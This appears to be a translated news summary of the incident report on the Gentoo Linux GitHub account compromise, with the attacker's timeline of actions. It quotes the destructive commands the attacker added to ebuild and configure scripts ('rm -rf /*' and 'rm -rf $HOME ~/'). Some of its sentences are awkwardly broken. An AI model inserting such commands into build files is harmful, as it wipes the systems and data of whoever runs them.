On June 28th, the account of the Gentoo Linux project on GitHub was compromised. The attacker then made extensive changes to Gentoo’s code, including maliciously adding the rm -rf /* command to the build script ebuild. The Gentoo project now publishes a detailed incident investigation report:
The attack occurred at 20:19 on the 28th, the attacker, logged in with the administrator password. Then attacker created an account with administrative access rights and proceeded to kick out the legitimate user, which contained the maintainer. It was this move that led to the invasion exposure and caused The Gentoo project notes that its GitHub account is just a mirror of the organisation, but removing the user will let the user receives notifications, so the Gentoo project begins to investigate the matter at 20:29.
The attacker modified the file from 20:34, “20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.“. “21:07 Malicious commit to gentoo/systemd, bf0e0a4d->50e3544d.
Payload: slightly obfuscated rm -rf $HOME ~/ at the top of the configure script.” The attacker was a bit amateur, and the entire intrusion process lasted only an hour.